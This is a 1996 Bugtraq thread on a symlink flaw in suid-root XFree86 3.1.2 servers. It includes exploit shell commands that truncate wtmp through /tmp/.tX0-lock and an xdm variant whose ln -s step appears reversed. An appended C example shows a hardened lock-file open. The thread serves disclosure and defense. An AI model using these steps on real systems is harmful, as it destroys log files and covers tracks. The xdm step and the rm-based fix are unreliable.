On Mon, 29 Jan 1996, David J Meltzer wrote:

> Date: Mon, 29 Jan 1996 00:16:46 -0500
> From: David J Meltzer <davem+@andrew.cmu.edu>
> To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
> Subject: XFree86 3.1.2 Security Problems
>
> There are security holes in XFree86 3.1.2, which installs its servers
> as suid root (/usr/X11R6/bin/XF86_*). When reading and writing files,
> it does not take proper precautions to ensure that file permissions are
> maintained, resulting in the ability to overwrite files, and to read
> limited portions of other files.
>
> The first problem stems from the server opening a temporary file,
> /tmp/.tX0-lock, with mode (O_WRONLY|O_CREAT|O_TRUNC). By making this
> file a symlink, the server will overwrite the original file, and then
> write to it its current pid.
>
> Other problems exist in the server relating to similar problems; one
> such example is the ability to specify an arbitrary file for the XF86config
> file, which will then be opened, and the first line that fails to match
> the expected format will be output with an error, allowing a line to be
> read from an arbitrary file.
>
> Program: XFree86 3.1.2 servers
> Affected Operating Systems: All systems with XFree86 3.1.2 installed
> Requirements: account on system
> Temporary Patch: chmod o-x /usr/X11R6/bin/XF86*
> Security Compromise: overwrite arbitrary files
> Author: Dave M. (davem@cmu.edu)
> Synopsis: While running suid root, XFree86 servers do
>           not properly check file permissions, allowing
>           a user to overwrite arbitrary files on a
>           system.
>
> Exploit:
> $ ls -l /var/adm/wtmp
> -rw-r--r--   1 root     root       174104 Dec 30 08:31 /var/adm/wtmp
> $ ln -s /var/adm/wtmp /tmp/.tX0-lock
> $ startx
> (At this point exit X if it started, or else ignore any error messages)
> $ ls -l /var/adm/wtmp
> -r--r--r--   1 root     root           11 Dec 30 08:33 /var/adm/wtmp

Oh well, if xdm is running, the temporary patch won't do you any good...
Xdm manages a collection of X displays, which may be on the local host or
remote servers. Xdm provides services similar to those provided by init,
getty and login on character terminals: prompting for login name and
password, authenticating the user, and running a ``session.'' Xdm is
launched by root; by default it will start a server on the local display.
If the server crashes for some reason, gets killed, or if the user sends a
server abort sequence, it will restart the server.

$ ps -ax | grep xdm
   80  ?   S    0:00 xdm
  142  ?   S    0:01 /usr/X11R6/bin/X -auth /usr/X11R6/lib/X11/xdm/A:0-a00080
  179 v03  D    0:00 grep xdm
$ ls -l /var/log/wtmp
-rw-r--r--   1 root     root        31864 Jan 30 02:13 /var/log/wtmp
$ ln -s /tmp/.tX0-lock /var/log/wtmp

Now, you switch to the local X display and send the <Ctrl><Alt><BS> server
abort sequence. Wait until xdm pops up a new server process, then switch
back to the shell:

$ ls -l /var/log/wtmp
-rw-r--r--   1 root     root           11 Jan 30 02:13 /var/log/wtmp

Xdm doesn't need to kill the server when a user logs out, so the only worry
would be the sending of the abort sequence, easily fixed by uncommenting
the "DontZap" setting in /etc/XF86Config. But I have seen XF86 crash so
many times for unguessable reasons that I don't think it will fix the
problem. Maybe someone could take a look at the server sources so it does
a system("/bin/rm /tmp/.tX0-lock") just before it writes to the file. I
don't have 'em handy.

Anthony C. Zboralski <frantic@worldnet.net>
Finger <frantic@webbar.imaginet.fr> for PGP Public Key
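A defender's illustration added here, not code from XFree86 or from either poster: the O_WRONLY|O_CREAT|O_TRUNC lock-file open the thread describes, beside a version that refuses to write through a planted symlink. The function names, the temp-dir "wtmp" stand-in, and the padded-pid format (11 bytes, matching the size the thread reports) are assumptions, and the code assumes Linux/glibc.

```c
#define _GNU_SOURCE   /* O_NOFOLLOW, dprintf, mkdtemp on glibc (assumes Linux) */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* The 3.1.2 pattern the post describes: O_TRUNC on whatever `path` resolves to. */
int write_lock_unsafely(const char *path, pid_t pid)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
    if (fd < 0) return -1;
    dprintf(fd, "%10ld\n", (long)pid);   /* assumed format: padded pid + newline */
    return close(fd);
}
/* Hardened: O_EXCL fails if anything already sits at `path` (a symlink included),
 * O_NOFOLLOW refuses symlinks, fstat() confirms a fresh regular file. 0 or -1/errno. */
int write_lock_safely(const char *path, pid_t pid)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0) return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd); errno = EPERM; return -1;
    }
    if (dprintf(fd, "%10ld\n", (long)pid) < 0) { close(fd); return -1; }
    return close(fd);
}
/* Constructed check in a private temp dir: plant ".tX0-lock" as a symlink to a
 * 14-byte stand-in "wtmp", run both writers. Returns 1 if the safe writer refused
 * and left wtmp intact, the unsafe one truncated it to the 11-byte pid line, and
 * the safe writer succeeds once the link is gone; 0 otherwise. */
int symlink_demo(void)
{
    char dir[] = "/tmp/lockdemo.XXXXXX", victim[64], lock[64]; struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(victim, sizeof victim, "%s/wtmp", dir);
    snprintf(lock, sizeof lock, "%s/.tX0-lock", dir);
    FILE *f = fopen(victim, "w");
    if (!f || fputs("login records\n", f) < 0 || fclose(f) != 0) return 0;
    if (symlink(victim, lock) != 0) return 0;
    int refused = write_lock_safely(lock, 4242) == -1 && (errno == EEXIST || errno == ELOOP);
    int intact = stat(victim, &st) == 0 && st.st_size == 14;
    write_lock_unsafely(lock, 4242);          /* follows the link, clobbers wtmp */
    int clobbered = stat(victim, &st) == 0 && st.st_size == 11;
    unlink(lock);
    int fresh_ok = write_lock_safely(lock, 4242) == 0;
    unlink(lock); unlink(victim); rmdir(dir);
    return refused && intact && clobbered && fresh_ok;
}
```

The fstat() step is what makes the check independent of the open flags: even if a port lacks O_NOFOLLOW, a descriptor that is not a freshly created regular file is never written.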